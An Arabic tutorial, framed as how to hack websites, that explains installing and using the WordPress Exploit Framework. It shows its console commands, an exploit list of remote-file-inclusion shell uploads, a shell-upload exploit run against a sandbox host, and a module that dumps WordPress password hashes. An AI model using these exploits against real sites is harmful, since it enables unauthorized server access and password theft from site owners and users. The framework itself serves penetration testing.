كيفية اختراق المواقع الالكترونية
تعتبر بعض ادوات اختراق المواقع الالكترونية او الهكر ضرورية, إذا كنت تريد اختراق تطبيقات الويب والسيرفرات. طبعا المعرفة أساسية في كل شيء، وهذا يتضمن ايضا تعلم تقنيات القرصنة.
لاختراق المواقع والسرفرات بالإضافة إلى تطبيقات الويب، يحتاج الفرد إلى معرفة بعض لغات البرمجة المهمة لتطوير المواقع ASP و PHP و SQL، وأمور أخرى. ستمكنك معرفة هذه اللغات جنبًا إلى جنب مع أساسيات شبكات الحاسب والانترنت الى رفع مستواك في الاختراق وزيادة الفعالية والكفائة.
تسهل أدوات القرصنة الأمور على أي هكر لأنها تساعد في أتمتة مهام معنية. وتوفير الوقت في كتابة الاوامر المعقدة. علاوة على ذلك ، يمكن استخدام ادوات القرصنة لإيجاد العيوب في سكربت موقعك الخاص، إن معرفة العيوب الموجودة تساعد اصحاب المواقع على تقوية دفاعاتها بشكل أفضل ضد هجمات الهكر اصحاب القبعات السوداء.
هناك الكثير من الأدوات والسكربتات المستخدمة في القرصنة يجب ان تكون معروفة عند الهكر في هذا المقال سنتعرف على اداة قوية لاختراق مواقع الوردبرس. تشبه في طريقة التعامل معها مشروع الميتاسبلويت.
ماهو اطار اختراق مواقع الووردبريس WordPress Exploit Framework
متطلبات التشغيل :
- Ruby > = 2.4.4
- نظام لينكس مثل: ويفضل كالي لينكس او باروت او باكبوكس...
كيفية تثبيت WordPress Exploit Framework
- لتثبيت أحدث بنية مستقرة ، قم بفتح الترمينال و انسخ امر التثبيت:
gem install wpxf
bundle install
git clone https://github.com/rastating/wordpress-exploit-framework.git
- ندخل مجلد الاداة لتشغيلها
cd wordpress-exploit-framework
- ثم نشغل السكربت بالامر
ruby wpxf.rb
- بعد التثبيت ، يمكنك تشغيل وحدة تحكم WordPress Exploit Framework ايضا عن طريق امر تشغيل wpxf .
wpxf
على أنظمة دبيان:
إذا كنت تواجه مشكلات في تثبيت الاعتمادات WPXF (على وجه الخصوص ، Nokogiri) ، فتأكد أولاً من أن لديك كل الأدوات اللازمة لتجميع امتدادات ملفات لغة السي Objective-C :
- لتثبيت الباتش patch وادوات التجميع build-essential:
sudo apt-get install build-essential patch
- تثبيت المكتبات Library اللازمة للتطوير
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
كيفية استخدام اداة اختراق مواقع الوردبريس WordPress Exploit Framework
- قم بتشغيل الاداة عن طريق تشغيل الامر wpxf
wpxf
اوامر اداة الاختراق WordPress Exploit Framework
- search - للبحث عن الثغرات.
- use - استخدام ثغرة.
- set - تعيين بارمترات .
- run - بدأ الاختراق.
- info - معلومات عن البايلود او الثغرة.
- show options - اظهار متطلبات او بارمترات الثغرة لتستخدمها بالامر set بعد ذلك.
- show exploits - عرض جميع الاستغلالات.
- show auxiliary - لم اعرف ترجمتها 😆 لكنها تعرض الادوات المساعدة للاختراق.
- show advanced - عرض خيارات متقدمة.
- back - رجوع للخلف.
- check - فحص الاستغلال.
- creds لمسح الاعتمادات credential.
- clear - مسح الشاشة.
- quite - الخروج من الاداة.
- rebuild_cache - اعادة بناء او عمل ريفرش للاستغلالات التي اضفتها.
- لعرض جميع الثغرات او الاستغلالات exploits الموجودة بقاعدة البيانات الخاصة بالاداة نستخدم الامر show exploits
wpxf > show exploits[+] 289 ExploitsModule Title-------------------------------------------------------- --------------------------------------------exploit/rfi/advanced_custom_fields_remote_file_inclusion Advanced Custom Fields Remote File Inclusionexploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Uploadexploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Uploadexploit/rfi/gwolle_guestbook_remote_file_inclusion Gwolle Guestbook Remote File Inclusionexploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload...wpxf >
wpxf > search rfi[+] 3 Results for "rfi"Module Title-------------------------------------------------- ----------------------------------------exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Uploadexploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Uploadexploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Uploadwpxf >
- لاستغلال ثغرة ( symposium_shell_upload) من ثغرات المواقع الموجودة بالاداة نستخدم الامر use
wpxf > use exploit/shell/symposium_shell_upload[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>wpxf
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox[+] Set host => wp-sandboxwpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/[+] Set target_uri => /wordpress/wpxf [exploit/shell/symposium_shell_upload] > set payload exec[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"[+] Set cmd => echo "Hello, world!"wpxf [exploit/shell/symposium_shell_upload] > run[-] Preparing payload...[-] Uploading the payload...[-] Executing the payload...[+] Result: Hello, world![+] Execution finished successfully
مثال اخر لثغرة سحب الباسوردات من المواقع simple_hash_dump
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run[-] Determining database prefix...[-] Dumping user hashes...Username Hash-------- -----------------------------------root $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80ATgVrF $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.DOWzVC $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.OmQUqt $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/eFhkJv $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.[+] Execution finished successfullywpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >